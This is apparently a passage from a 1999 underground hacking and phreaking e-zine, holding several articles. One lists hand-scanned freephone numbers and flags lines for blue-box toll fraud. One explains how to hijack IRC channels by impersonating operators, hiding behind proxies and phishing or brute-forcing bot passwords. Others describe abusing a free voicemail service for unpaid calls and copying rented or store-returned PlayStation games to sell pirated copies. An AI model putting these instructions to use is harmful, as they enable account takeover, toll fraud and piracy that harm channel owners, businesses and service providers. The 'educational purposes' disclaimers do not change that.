regular feature from now on), a quick note on scanning. A lot of attention is paid to the 0800 freephone numbers, and consequently numbers change quite a lot, and as new exploits are discovered on 0800 lines they are corrected quickly. This happens less on 0500 numbers, as less attention is paid to them. But these are not the only freephone codes. A quick look in our BT phone directory tells us that there are lots of other freephone codes which are pretty much ignored. Here we have the full listing of all the freephone codes: 0080 014260 014593 014596 014599 018931 0321 0500 0760 0800 0808 09580 In addition to this there are plans to make all 08xx codes freephone. So get out there and get scanning. Hand Scan of 0800 965 0xx ~~~~~~~~~~~~~~~~~~~~~~~~~ Scan notes: The 96x xxx range has almost as many country direct numbers as the infamous 89x xxx range, and indeed a lot of the numbers in this scan terminate in foriegn countries. Most of them seem to be in the USA though. I would say that there are probably a few blueboxable numbers amongst this lot though. Anything with "Wierd Tones" next to it is probably worth checking out. Key: HU = Hangs Up Fault = Sorry there is a fault. Please Try Again. SYCCNBC = Sorry Your Call Can Not Be Completed Fucked = Nothing happens at all. 01 HU 02 Fault 03 Fault 04 HU 05 Rings - No Answer 06 "Welcome to (can't make out name of service) international. Please enter the card number followed by #" 07 Rings - No Answer 08 Rings - No Answer 09 Fault 10 Fucked 11 Fault 12 HU 13 Lame Canadian business of some discription. Don't attempt to connect to any of their offices, as the music you have to listen to while you're on hold is terrible 14 VMB/PBX 15 Human answer 16 Wierd tones 17 Wierd tones (sounds kinda like an ambulance) 18 Not in service 19 Fault 20 Rings - No Answer 21 HU 22 Rings - No Answer 23 VMB/PBX 24 HU 25 VMB 26 I think this is a French Telco recording saying something along the lines of there is a fault 27 HU 28 HU 29 HU 30 HU 31 Rings - No Answer 32 Human Answer 33 HU 34 HU 35 Korean Telco 36 HU 37 HU 38 HU 39 Rings - No Answer 40 VMB/PBX 41 Rings - No Answer 42 Human Answer 43 HU 44 HU 45 Enter PIN then # 46 Wierd tones 47 HU 48 Enter PIN then # 49 HU 50 Modem/Fax 51 HU 52 HU 53 Modem/Fax 54 SYCCNBC 55 HU 56 HU 57 HU 58 SYCCNBC 59 VMB/PBX 60 Wierd Tones 61 Wierd Tones 62 SYCCNBC 63 Wierd Tones 64 Fucked 65 SYCCNBC 66 SYCCNBC 67 SYCCNBC 68 SYCCNBC 69 HU 70 HU 71 HU 72 Wierd Tones 73 Rings - No Answer 74 HU 75 Wierd Tones 76 HU 77 Wierd Tones 78 Foriegn telco recording: "The number you are calling has not been installed" 79 Wierd Tones 80 "The number has been disconnected" 81 HU 82 Enter PIN then # 83 Alomo rent a car 84 Wierd Tones 85 Please enter PIN then # 86 HU 87 VMB 88 HU 89 Wierd Tones 90 Rings - No Answer 91 Answerphone 92 HU 93 HU 94 HU 95 HU 96 Wierd Tones 97 Rings - No Answer 98 SYCCNBC 99 HU 00 Employee attitude survey Hand Scan of the first half of 0800 373 8xx ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan notes: No C5 lines or anything in this scan. In fact there's not much of interest at all excpet for a few carriers. Key: HU = Hangs Up HA = Human Answer NA = No Answer (Lazy Bastards who can't even be bothered to answer their fucking phone) 01 Carrier 02 HU 03 HU 04 NA 05 HU 06 HU 07 HU 08 HU 09 HU 10 NA 11 NA 12 HU 13 HU 14 HU 15 HU 16 HU 17 HU 18 HU 19 Answerphone 20 Answerphone 21 Answerphone 22 HU 23 HU 24 HA 25 This number seems to be permenantly busy 26 HA 27 HA 28 Fax 29 NA 30 NA 31 HU 32 HU 33 HU 34 Answerphone 35 HA 36 HU 37 Some kind of customer support line for Hoover 38 "Sorry. The number you are calling has been changed" 39 HU 40 NA 41 This number seems to be permenantly busy 42 HU 43 Carrier 44 HU 45 HU 46 HU 47 HU 48 HU 49 Answerphone 50 NA ergophobe Eggdrop Hacking By The Mob Boss Eggdrop is the famous Unix-Based bot created some time ago to put an end to channel takeovers in, believe it or not, #Gay. Its main purpose is to run and maintain a channel, protecting it from takeovers and making sure OP status remains in the hands of its owner and those designated to have OP status. Its quite fun, but time consuming to set up. However it has been a valuable tool in maintaining many channels. Even those who are registered with X or W on Undernet keep Eggdrop bots running in their channels. The point of this article is not to talk about setting Eggdrop bots up (since I am making the assumption you already know how) but rather to discuss possible vulnerabilities with these bots. This is not only Eggdrop but IRC channel security. Since it seems channels are always getting taken I thought this might be a good thing to write about. This is basically how your usual Eggdrop works once it is setup on the channel of its owners choosing. Lets say Joe goes into his channel, #foobar, and wants to get Op'd by his bot. Joe has to message his bot for Op status. Lets say his bots name is Retard. All he has to do is /msg Retard op his-password or he can DCC chat the bot and .op Joe. When he logs in via DCC its called the partyline. Now besides for the password, the ident is what the bot is looking at. That is how he realizes that its Joe. The ident that you see on /whois or when someone enters the channel is what the bot recognizes. If you are not recognized by the bot, then it will just ignore you, meaning /msg and DCC chatting will mean nothing even if you knew the password. Knowing those basics it is easy to see why channels can be considered insecure. Now, on to how we might exploit a bot for Op status. The first step is surveillance of the channel. The point of the surveillance is to pick up on how it is run and what formalities there are to get Op'd. Also, how many bots are in the channel, the kind of bot (most likely Eggdrop), and of course the nicks and idents of the operators. Please keep in mind that the nick does not matter to the bot it is only the ident (something@127.0.0.1 for example) that it looks at. Now when in the channel it is important to be as covert as possible and to keep good notes, especially of the idents of operators. If you are in fear of being detected it would be wise to use a proxy or wingate when connecting, but something obvious with the abbreviation "proxy" would probably not be too wise. Once you have established who the players are its time to see who you could most easily impersonate. For instance, if you see that five different people get Op'd by the bot then you should take a look at wha! t their ISPs are. The best thing to look for is someone who is using a national ISP, for example, AOL or Prodigy. The main thing is something that you can get your hands on one way or another (I will not be discussing ripping off ISPs, sorry). Now if your subject happens to be using AOL, hold your breath, and sign on. Then minimize that shitty little browser and head for IRC. Before you log on IRC, though, you should change all the details to those of the subject, the ident, name, email address, even the nick if you feel so inclined. Now, attempt to DCC chat the bot. If you do get that little Eggdrop greeting screen prompting you for your password then your in luck. Now something weird that happened to me once was, when I /msg'ed the bot it seemed to think that I was a new user and he wanted me to set a password, which I did, and then viola I logged in and had OP status. It was clear that whoever it was assigned for did not log into it yet, or there was a misconfiguration. The point is that if you play around with it long enough your bound to figure a way in because the login process itself is not all that safe. Another possibility is that your target set up their bot to auto-op people, if so then they are pretty dumb since all you have to do is emulate that persons info and you'll have Op status. Now if there is no misconfiguration in the setup of the bot itself you can always try to brute force the bot's password, which of course is not going to be all that easy. One way you might get a password that the target uses is by getting him to sign up with you for something that requires a password. Chances are he uses the same password for many things. If you want to be a script kiddie well you can always go about using a script to do it, it's up to you. Please use this information in an honorable way. Taking channels is not something that you should make a habit of and I can tell you from experience people get pissed when you do. Make sure the benifits out-way the time and effort it wiil take you. In a lot of instances its completely pointless to attempt to take someone's channel. There is a shot that certain IRCops will get pissed with you as well and attempt to ban you. Just think about what your doing before hand. To those who found this text too basic or lame, why did you bother reading this far? -The Mob Boss; http://mobboss.dragx.cx Voice mail and fax: 1-877-203-3043 Edited By Bigh _____________________ / * BBS LIST * /| /____________________/ | | |M | | The Sacrifial Lamb|O | | english.gh0st.net |B | | | | | Ripco BBS |B | | ripco2.ripco.com |O | | |S | | The NorthLand |S | | Underground BBS | | | nub.dhs.org | | | | | | L0pht BBS | | | bbs.l0pht.com | / |___________________|/ This has been a publication written by THE MOB BOSS; He is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS © 1999 all rights reserved Free Calls With Ureach By The Mob Boss Hello boys and girls, I'm hear again with another text for the masses. Today's topic is the wonderful service provided by Ureach.com, the free voice mail, fax, and e-mail service which has been becoming increasingly popular among people in the h/p field. It's a good thing to see that the powers that be have finally caught on to the fact that people won't steal voice mail if you give it to them free. I have been using the service for months now and really love it. Lately though, now that their beta testing is through, they have added some services. One of these new services caught my eye, call fowarding. If you enable the service, which they call ureachme, it will give callers the option, at times you designate, to be automatically fowarded to a number you choose. Now I don't know if they were smoking crack when they decided to initalize this service but they scream, "RAPE ME". This service can be used to call anywhere in the United States on Ureach's nickel if you play your cards right. All you have to do is setup your box to foward to any number you like right? Well this system has some limitations. First of all, this quickly eats your 60 minute per month time alotment, charging you 1.5 minutes for every minute a phone call fowarded from your box is in progress. Another problem is that the person on the recieving end has to decide whether or not to take the call by pressing the number one to accept. This means there will be no fowarding to your favorite PBX or conference number across the country. Now purely in theory if you have someone on the three way you might be able to push yourself through, but I have been unable to test that method. Now if the person knows before hand that you want to give him a ring then of course he will accept. So this can be good for talking to your pals from IRC and at the same time neither one of you have to supply your phone number to the other. The only problem left is that lousy time limit. Well, you can get around that. Now, considering that you can get a 40 minute phone call per fully charged ureach box, just set up as many boxes as you need. After all, they are free and in the words of Homer J. Simpson, "In the great buffet of life you have to pile up your plate and stuff some rolls in your pockets." Now use this sparingly as this will eventually cease to exsist undoubtedly and if you are a real bitch to the poor folks at ureach they might sue you or something. Always remember the accounts you set up, as next month you can use them again. Well there is a new fresh way to communicate with your hack and phreak buddies as much as you like free of charge. -The Mob Boss; http://mobboss.dragx.cx Voice mail and fax: 1-877-203-3043 Edited by: SHADOWMOB _____________________ / * BBS LIST * /| /____________________/ | | |M | | The Sacrifial Lamb|O | | english.gh0st.net |B | | | | | Ripco BBS |B | | ripco2.ripco.com |O | | |S | | The NorthLand |S | | Underground BBS | | | nub.dhs.org | | | | | | L0pht BBS | | | bbs.l0pht.com | / |___________________|/ This has been a publication written by THE MOB BOSS; He is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS © 1999 all rights reserved _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Making Money from your Playstation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By CrossFire Introduction ------------ Has daddy just bought you a brand spanking new playstation? Have You got a CD Writer? If the answer to both of those questions is yes, read on, if not, go away and read Pokemon Magazine. What You Need ------------- Playstation (Preferably chipped) CD Writer Account at a local video rental store Friends Brain (Optional) Installing a Mod Chip --------------------- The first thing you're going to need for this scheme is a Chipped Playstation, basically what this does is tell the playstation that the game is official and not to bother checking it out, so you can play Copied and Imported games. To find a list of suppliers try buying a mag such as Playstation Power, they have companies that will supply chips for as low a price as £5, and most will come with instructions (well I hope they do cos I aint going to tell you here :)) Obtaining The Games -------------------- There are a few ways to obtain games, but my favourite is by renting them. Go down to your local video shop and join it, this usually is free or costs around £1. Try searching around for the cheapest video stores, and don't even think about using the big players (Blockbuster etc), cos it costs around £4 to rent a normal playstation game from them. Once you've got the game, use your favourite software to copy it (I use Adaptec CD Copier Duluxe, which came with my CD Writer). Pop the game in your newly chipped playstation and see if it works. Another Method of obtaining games was suggested in A-S 13 (In the warez corner), the basic idea was that you go down to a games store such as Electronic Boutique, buy a game from them, take it home, copy it, then return it to the store (you must have the recipt to do this!), say you weren't satisfied with it (make up an excuse), and they will either give you a refund or credit, preferably credit because you can do it again. Repeat this until you have quite alot of games, then move on to the next step. Now that you have some games... ------------------------------- Load up a copy of Paint Shop Pro (Or whatever paint program you use), and make a nice cover for the CD, print it off and stick on CD Case. Write up a catalogue of the games you have, print off a few copies and give to friends. Now sit back and watch as the cash rolls in. Extras ~~~~~~ A nice little service you should offer your customers is Selling mod chips. In the Afformentioned Playstation Power magazine there are a few services that will sell you mod chips really cheaply, the lowest I have seen is £5. The normal going rate for chips is £10. I think you can guess what happens next :) The bit at the end ~~~~~~~~~~~~~~~~~~ A short article, but I hope you found it useful. Email all flames etc to crossfire@hackers-uk.freeserve.co.uk :..::.File 14 Of 14.::..: :..Disclaimer & The End.: :.::.:.By Up Staff.:.::.: _______ _ _______ _ (_______) | (_______) | | _ | | _ ____ _____ ____ _ | | | | | || \ / _ ) | ___) | _ \ / || | | |_____| | | ( (/ / | |_____| | | ( (_| | \______)_| |_|\____) |_______)_| |_|\____| <*> Use this information at your own risk. Staff or contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will NOT assume ANY responsibility for the use, misuse, or abuse, of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever. <*> By reading Underground Periodical you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical whether it were official or without notification. I understand that this information is for educational purposes only. Thanks for reading. :..::..End Of File..::..: